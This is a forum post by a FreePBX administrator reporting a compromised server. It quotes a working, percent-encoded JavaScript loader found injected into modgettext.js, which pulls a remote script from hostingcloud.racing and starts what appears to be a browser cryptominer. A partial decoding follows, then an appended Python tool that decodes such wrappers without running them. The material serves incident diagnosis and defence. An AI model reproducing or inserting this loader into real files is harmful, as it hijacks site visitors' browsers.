Hello all. I’m getting the following warning on one of my servers:
Module: “FreePBX Framework”, File: “/var/www/html/admin/assets/js/modgettext.js altered”.
Seems like I may have been compromised. Any ideas how this may have happened? I had the admin portal open to the internet, both on http and https, but I wouldn’t expect a bad actor to be able to modify my files simply due to that.
I checked the file and I noticed this errant, clearly obfuscated and harmful, line quite a bit below the normal bottom of the file:
eval(unescape('%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%27%3C%73%63%72%69%70%74%20%74%79%70%65%3D%22%74%65%78%74%2F%6A%61%76%61%73%63%72%69%70%74%22%3E%65%76%61%6C%28%75%6E%65%73%63%61%70%65%28%5C%27%25%36%34%25%36%46%25%36%33%25%37%35%25%36%44%25%36%35%25%36%45%25%37%34%25%32%45%25%37%37%25%37%32%25%36%39%25%37%34%25%36%35%25%32%38%25%32%37%25%33%43%25%37%33%25%36%33%25%37%32%25%36%39%25%37%30%25%37%34%25%32%30%25%37%33%25%37%32%25%36%33%25%33%44%25%32%32%25%36%38%25%37%34%25%37%34%25%37%30%25%37%33%25%33%41%25%32%46%25%32%46%25%37%37%25%37%37%25%37%37%25%32%45%25%36%38%25%36%46%25%37%33%25%37%34%25%36%39%25%36%45%25%36%37%25%36%33%25%36%43%25%36%46%25%37%35%25%36%34%25%32%45%25%37%32%25%36%31%25%36%33%25%36%39%25%36%45%25%36%37%25%32%46%25%35%37%25%35%39%25%35%41%25%37%37%25%32%45%25%36%41%25%37%33%25%32%32%25%33%45%25%33%43%25%32%46%25%37%33%25%36%33%25%37%32%25%36%39%25%37%30%25%37%34%25%33%45%25%35%43%25%36%45%25%33%43%25%37%33%25%36%33%25%37%32%25%36%39%25%37%30%25%37%34%25%33%45%25%35%43%25%36%45%25%32%30%25%32%30%25%32%30%25%32%30%25%37%36%25%36%31%25%37%32%25%32%30%25%35%46%25%36%33%25%36%43%25%36%39%25%36%35%25%36%45%25%37%34%25%32%30%25%33%44%25%32%30%25%36%45%25%36%35%25%37%37%25%32%30%25%34%33%25%36%43%25%36%39%25%36%35%25%36%45%25%37%34%25%32%45%25%34%31%25%36%45%25%36%46%25%36%45%25%37%39%25%36%44%25%36%46%25%37%35%25%37%33%25%32%38%25%35%43%25%32%37%25%33%30%25%33%30%25%33%35%25%33%30%25%33%39%25%33%31%25%36%31%25%36%31%25%33%38%25%33%33%25%36%35%25%33%32%25%33%36%25%33%35%25%33%32%25%36%33%25%33%39%25%36%36%25%36%36%25%33%31%25%33%30%25%33%33%25%36%36%25%33%38%25%33%38%25%36%31%25%36%35%25%33%37%25%33%37%25%33%37%25%33%33%25%33%37%25%36%34%25%33%32%25%33%35%25%33%32%25%33%31%25%33%34%25%36%35%25%36%35%25%36%33%25%36%36%25%36%34%25%33%38%25%36%33%25%33%36%25%33%30%25%33%31%25%36%32%25%33%37%25%33%37%25%33%37%25%33%33%25%33%33%25%33%35%25%33%31%25%36%34%25%33%36%25%33%35%25%36%33%25%33%38%25%33%32%25%33%38%25%33%30%25%35%43%25%32%37%25%32%43%25%32%30%25%37%42%25%35%43%25%36%45%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%37%34%25%36%38%25%37%32%25%36%46%25%37%34%25%37%34%25%36%43%25%36%35%25%33%41%25%32%30%25%33%30%25%32%43%25%32%30%25%36%33%25%33%41%25%32%30%25%35%43%25%32%37%25%37%37%25%35%43%25%32%37%25%32%43%25%32%30%25%36%31%25%36%34%25%37%33%25%33%41%25%32%30%25%33%30%25%35%43%25%36%45%25%32%30%25%32%30%25%32%30%25%32%30%25%37%44%25%32%39%25%33%42%25%35%43%25%36%45%25%32%30%25%32%30%25%32%30%25%32%30%25%35%46%25%36%33%25%36%43%25%36%39%25%36%35%25%36%45%25%37%34%25%32%45%25%37%33%25%37%34%25%36%31%25%37%32%25%37%34%25%32%38%25%32%39%25%33%42%25%35%43%25%36%45%25%33%43%25%32%46%25%37%33%25%36%33%25%37%32%25%36%39%25%37%30%25%37%34%25%33%45%25%32%37%25%32%39%25%33%42%5C%27%29%29%3B%3C%2F%73%63%72%69%70%74%3E%27%29%3B'));
Which, when unescaped a couple times, gives us something like:
document.write('\x3Cscript type="text/javascript">eval(`document.write('\x3Cscript src="https://www.hostingcloud.racing/WYZw.js">\x3C/script>\\n\x3Cscript>\\n var _client = new Client.Anonymous(\\'005091aa83e2652c9ff103f88ae77737d25214eecfd8c601b7773351d65c8280\\', {\\n throttle: 0, c: \\'w\\', ads: 0\\n });\\n _client.start();\\n\x3C/script>');\\`);\x3C/script>');
I can’t see the script at https://www.hostingcloud.racing/WYZw.js but I’m sure it’s not good.
Do you have any recommendations on further places to check for potential methods used to modify this file? Or what this script might actually be doing? I can’t access the script at the URL, but the site is still online.
Looks like that file was last modified 3 days ago.
Any suggestions or thoughts? If not, I figured it would be good to at least get this out there for any of the security experts to be aware of.
Also, do you think this calls for a total reinstall, or could I simply revert to a backup from a week ago and be sure to update any potentially out of date modules?
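As an added example (not code from the original post or from FreePBX), here is a small Python decoder for the kind of nested eval(unescape('...')) wrapper shown above. It implements JavaScript's own unescape() semantics (%XX and %uXXXX, no UTF-8 interpretation), which differ from ordinary URL decoding, peels the layers off one at a time, and lists any remote script src it finds so the injected loader can be identified without executing anything. The payload it runs on is a constructed sample that nests two layers around a placeholder domain (example.invalid); it is not the payload from the post.

```python
import re

# JavaScript unescape(): %XX -> one code point 0..255, %uXXXX -> one UTF-16 code unit.
# urllib.parse.unquote would try to decode bytes as UTF-8, so we implement it directly.
_ESC = re.compile(r'%u([0-9A-Fa-f]{4})|%([0-9A-Fa-f]{2})')


def js_unescape(s):
    """Decode a string the way JavaScript's unescape() does."""
    return _ESC.sub(lambda m: chr(int(m.group(1) or m.group(2), 16)), s)


def js_escape(s):
    """Inverse of js_unescape; only used here to build the constructed sample."""
    return ''.join('%%%02X' % ord(c) if ord(c) < 256 else '%%u%04X' % ord(c) for c in s)


# One eval(unescape('...')) wrapper. The quote may be ' or \' because inner layers
# sit inside an outer JavaScript string literal (as in the post's payload).
_WRAPPER = re.compile(r"eval\(unescape\((\\?['\"])(.*?)\1\)\)", re.S)

# <script ... src="..."> in decoded text; also accepts the \x3C spelling of '<'.
_SRC = re.compile(r'(?:<|\\x3C)script[^>]*\bsrc=\\?["\']([^"\'\\]+)', re.I)


def unwrap(payload, max_layers=10):
    """Return the list of layers: [original, after 1 decode, after 2 decodes, ...]."""
    layers = [payload]
    current = payload
    for _ in range(max_layers):  # bounded so a malformed payload cannot loop forever
        m = _WRAPPER.search(current)
        if not m:
            break
        current = js_unescape(m.group(2))
        layers.append(current)
    return layers


def extract_script_urls(js):
    """Sorted, de-duplicated list of remote script sources referenced in decoded JS."""
    return sorted(set(_SRC.findall(js)))


def analyse(payload):
    """Unwrap a payload and report depth plus every script URL seen at any layer."""
    layers = unwrap(payload)
    urls = sorted({u for layer in layers for u in extract_script_urls(layer)})
    return {'depth': len(layers) - 1, 'layers': layers, 'script_urls': urls}


# Constructed sample (hypothetical, not the post's payload): the innermost layer injects a
# remote script from a placeholder domain; two eval(unescape()) layers wrap it.
INNER_JS = "document.write('<script src=\"https://example.invalid/loader.js\"></script>');"
MIDDLE_JS = "document.write('<script>eval(unescape(\\'%s\\'));</script>');" % js_escape(INNER_JS)
SAMPLE_PAYLOAD = "eval(unescape('%s'));" % js_escape(MIDDLE_JS)

if __name__ == '__main__':
    report = analyse(SAMPLE_PAYLOAD)
    print('wrapper layers removed:', report['depth'])
    for i, layer in enumerate(report['layers']):
        print('layer %d: %s' % (i, layer[:80]))
    print('remote scripts referenced:', report['script_urls'])
```

To use it on a real find, paste the suspicious line into SAMPLE_PAYLOAD's place (or read it from the altered file) and run the script; the domain list it prints is what you would block at the egress and search for across the rest of the web root, and the decoded layers are what you would keep with the incident notes. It never evaluates the JavaScript, so it is safe to run on an analysis box.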